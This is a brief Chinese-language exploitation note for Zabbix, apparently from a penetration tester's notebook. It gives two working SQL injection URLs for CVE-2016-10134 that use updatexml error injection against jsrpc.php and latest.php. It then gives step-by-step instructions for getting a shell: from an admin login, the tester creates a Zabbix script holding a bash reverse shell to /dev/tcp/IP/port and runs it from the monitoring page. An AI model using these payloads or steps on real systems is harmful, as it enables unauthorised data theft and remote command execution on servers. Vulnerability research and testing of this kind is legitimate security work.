Zabbix
1.漏洞复现
CVE-2016-10134 SQL注入
影响范围:Zabbix 2.2.x、3.0.0 - 3.0.3
漏洞页面1:
GET请求进行SQL注入,/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)
漏洞页面2:
登录(可能可以以Guest登录),GET请求进行SQL注入,/latest.php?output=ajax&sid=Cookie的zbx_sessionid后16位&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)
GetShell
zabbix_agentd.conf配置了EnableRemoteCommands=1
以管理员登录,Administration->Scripts->Create script->名称随意、内容bash -i >& /dev/tcp/IP/端口 0>&1->add
Monitoring->Latest data->找到脚本执行